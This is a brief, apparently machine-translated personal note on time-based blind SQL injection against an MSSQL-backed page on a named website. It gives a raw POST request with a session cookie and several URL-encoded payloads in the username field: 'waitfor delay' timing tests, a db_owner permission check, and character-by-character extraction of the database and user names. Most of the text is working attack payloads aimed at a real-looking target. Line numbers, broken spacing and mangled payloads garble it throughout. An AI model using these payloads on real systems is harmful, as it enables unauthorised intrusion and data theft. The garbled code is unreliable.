The basic knowledge of injection will not be mentioned. Just make a simple note here, so that you can use it later. 01 POST/card. aspx HTTP/1.102 Content-Length: 9603 Content-Type: application/x-www-form-urlencoded04 X-Requested-With: XMLHttpRequest05 Cookie: ASP. NET_SessionId = 2k32d0nwvrzpbg55qucudt3b06 Host: www. cunlide. com07 Connection: Keep-alive08 Accept-Encoding: gzip, deflate09 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 10 Accept: */* 11 12 www.2cto.com
Cardid = 1 & cardpwd = 1 & Submit2 = 1 & username = pxnjodhe % 27% 3b % 20 waitfor % 20 delay % 20% 270% 3a0% 3a5% 27% 20 -- % 20 view POST data, injection occurs in username. It is clear to decode the URL of the username value. 1 pxnjodhe % 27% 3b % 20 waitfor % 20 delay % 20% 270% 3a0% 3a5% 27% 20 -- % 202 3 pxnjodhe '; waitfor delay '0: 0: 5' -- latency injection is determined by the time returned by the page, so when I guess, I use time to guess, for example, we can extract the first character of db_name and convert it to ASCII for comparison with numbers (recommended <,>). We can use the half-fold method for comparison, for example, we first guess whether the first character is uppercase or lowercase letters, you can use 91 to do a standard less than 91 for uppercase letters (A-F, maybe _,-), greater than the limit. The following two statements are used as an example: 1 cardid = 1 & cardpwd = 1 & Submit2 = 1 & username = pxnjodhe % 27; if % 20 (0% 3D (SELECT % 20IS_MEMBER ('db _ owner') % 20 waitfor % 20 delay % 20% 270: 0: 11% 27% 20 -- % 202 // judge permission 3 cardid = 1 & cardpwd = 1 & Submit2 = 1 & username = pxnjodhe % 27; if (ascii (substring (db_name (), 40%)> 20% 20 waitfor % 20 delay % 270: 0: 2% 27% 20 -- % 204 // database name 5 cardid = 1 & cardpwd = 1 & Submit2 = 1 & username = pxnjodhe % 27; if (ascii (substring (user_name (), 115%)> 20 waitfor % 20d Elay % 20% 270: 0: 1% 27% 20 -- % 206 // when the user name is recommended but the encoding status is incorrect, try the unencoded status. If any error occurs, correct it.